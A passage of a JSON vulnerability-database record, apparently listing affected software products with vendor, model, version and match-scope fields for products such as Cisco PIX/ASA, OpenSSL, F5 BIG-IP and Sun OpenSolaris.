"model": "java system application server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "ace series application control engine appliances 3.0 a3",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4700"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0"
},
{
"_id": null,
"model": "opensolaris build snv 114",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "os/400 v5r4m0",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.2"
},
{
"_id": null,
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.3.0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "opensolaris build snv 45",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "arubaos rn",
"scope": "ne",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.1.4"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.2"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2.1"
},
{
"_id": null,
"model": "project proftpd 1.3.2b",
"scope": null,
"trust": 0.3,
"vendor": "proftpd",
"version": null
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0.0.52"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "opensolaris build snv 28",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"_id": null,
"model": "project openssl 0.9.8l",
"scope": "ne",
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "java system web server update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.01"
},
{
"_id": null,
"model": "coat systems director",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.4"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.8"
},
{
"_id": null,
"model": "systems insight manager c",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "05.00.02"
},
{
"_id": null,
"model": "download accelarator",
"scope": "eq",
"trust": 0.3,
"vendor": "prozilla",
"version": "1.4.0"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.51"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0"
},
{
"_id": null,
"model": "meeting exchange web conferencing server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "-0"
},
{
"_id": null,
"model": "matrixssl",
"scope": "ne",
"trust": 0.3,
"vendor": "matrixssl",
"version": "1.8.8"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.10"
},
{
"_id": null,
"model": "java system web server update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.06"
},
{
"_id": null,
"model": "java system web server update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.02"
},
{
"_id": null,
"model": "java system web proxy server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "4.0.5"
},
{
"_id": null,
"model": "project openssl h",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "unified ip phone 7911g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "windows professional",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "linux enterprise sdk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "blackberry enterprise server for domino mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "rsa data protection manager appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "emc",
"version": "3.5"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2)12"
},
{
"_id": null,
"model": "project openssl i",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"_id": null,
"model": "opensolaris build snv 67",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "opensolaris svn 126",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "project openssl b",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "opensolaris build snv 51",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows xp home sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.1"
},
{
"_id": null,
"model": "client",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "2008"
},
{
"_id": null,
"model": "virtual connect 8gb 24-port fc module",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.0"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0(1)"
},
{
"_id": null,
"model": "7.0-release-p12",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "unified callmanager 4.1 sr8a",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.6.1"
},
{
"_id": null,
"model": "windows vista home basic sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
},
{
"_id": null,
"model": "oracle10g personal edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0.4"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.0"
},
{
"_id": null,
"model": "opensolaris build snv 77",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.80"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(3)"
},
{
"_id": null,
"model": "ucosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.5"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.4.5"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2009.0"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2.2"
},
{
"_id": null,
"model": "windows xp 64-bit edition version",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "opensolaris build snv 82",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.3"
},
{
"_id": null,
"model": "project proftpd a",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3"
},
{
"_id": null,
"model": "7.0-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.2.4.8"
},
{
"_id": null,
"model": "windows for 32-bit systems",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3.1"
},
{
"_id": null,
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "opensolaris build snv 126",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "wireless control system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(2.24)"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15000"
},
{
"_id": null,
"model": "jdk 1.5.0 11",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows advanced server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "java system directory server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "12.2"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.5"
},
{
"_id": null,
"model": "pfsense",
"scope": "eq",
"trust": 0.3,
"vendor": "bsdperimeter",
"version": "1.2.1"
},
{
"_id": null,
"model": "onboard administrator",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.32"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2.19)"
},
{
"_id": null,
"model": "web server r3",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.1"
},
{
"_id": null,
"model": "unified callmanager 3.3 sr3",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.51"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.6"
},
{
"_id": null,
"model": "7.1-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(5)"
},
{
"_id": null,
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.8"
},
{
"_id": null,
"model": "fwsm for cisco catalyst series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6500/76003.1"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "2.1-rc21",
"scope": "ne",
"trust": 0.3,
"vendor": "openvpn",
"version": null
},
{
"_id": null,
"model": "windows vista",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "2.5.6.0"
},
{
"_id": null,
"model": "pix series security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5007.1"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.3"
},
{
"_id": null,
"model": "project proftpd rc3",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3.2"
},
{
"_id": null,
"model": "jdk 1.5.0.0 06",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "5.0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.3"
},
{
"_id": null,
"model": "opensolaris build snv 111",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.0.6"
},
{
"_id": null,
"model": "ucosminexus service architect",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "opensolaris build snv 118",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "cosminexus processing kit for xml",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "unified ip phone sip",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.8(0)"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.5.2"
},
{
"_id": null,
"model": "java system web server sp9",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "fwsm for cisco catalyst series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6500/7600"
},
{
"_id": null,
"model": "security agent for callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.628"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.6.1"
},
{
"_id": null,
"model": "weblogic server mp3",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "opensolaris build snv 112",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "messaging application server mm",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "cosminexus application server enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "java system web server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.0.5"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.1.3"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3-2"
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "opensolaris build snv 96",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.12"
},
{
"_id": null,
"model": "windows professional sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "appliance platform linux service",
"scope": "eq",
"trust": 0.3,
"vendor": "rpath",
"version": "1"
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7936"
},
{
"_id": null,
"model": "opensolaris build snv 129",
"scope": "ne",
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.4.6"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)82"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.4.6"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.4.1"
},
{
"_id": null,
"model": "opensolaris build snv 36",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.1"
},
{
"_id": null,
"model": "arubaos rn",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.1.0"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "opensolaris build snv 48",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.14"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"_id": null,
"model": "integrated lights-out",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "32.05"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)7"
},
{
"_id": null,
"model": "arubaos",
"scope": "ne",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.4.7"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"_id": null,
"model": "windows advanced server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "system management homepage",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "6.1.0.102"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.5"
},
{
"_id": null,
"model": "java system web server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "windows vista business",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.3"
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.0.3"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.6"
},
{
"_id": null,
"model": "project openssl l",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "opensolaris build snv 50",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified callmanager 4.2 sr4b",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "windows server for x64-based systems",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2)14"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.3"
},
{
"_id": null,
"model": "-release-p9",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.5.0"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.3"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.6"
},
{
"_id": null,
"model": "cosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(0.08)"
},
{
"_id": null,
"model": "esx",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "4.0"
},
{
"_id": null,
"model": "aura communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "windows server itanium sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "unified ip phone sip sscp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(6)"
},
{
"_id": null,
"model": "windows xp home sp3",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "ironport email security appliance x-series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.9"
},
{
"_id": null,
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.4"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.7"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"_id": null,
"model": "project openssl d",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.5.2"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.2.2"
},
{
"_id": null,
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "windows vista ultimate 64-bit edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"_id": null,
"model": "project openssl beta2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2"
},
{
"_id": null,
"model": "one directory server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "wireless lan controllers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.176.0"
},
{
"_id": null,
"model": "enterprise linux server supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "unified contact center enterprise icm7.1 es46",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(2.14)"
},
{
"_id": null,
"model": "systems insight manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)26"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.25"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.3.1"
},
{
"_id": null,
"model": "coat systems director",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.2.2.5"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)11"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0.2"
},
{
"_id": null,
"model": "jdk 1.5.0 11-b03",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0.2"
},
{
"_id": null,
"model": "opensolaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "2009.06"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.2.4"
},
{
"_id": null,
"model": "css11500 content services switch",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.10.2.65"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.0"
},
{
"_id": null,
"model": "communication manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "pix series security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5007.0"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.1"
},
{
"_id": null,
"model": "project openssl e",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.12"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.13"
},
{
"_id": null,
"model": "big-ip wan optimization module",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "security agent for ipcc hosted",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.639"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "3.1.1"
},
{
"_id": null,
"model": "project openssl f",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "opensolaris build snv 111a",
"scope": null,
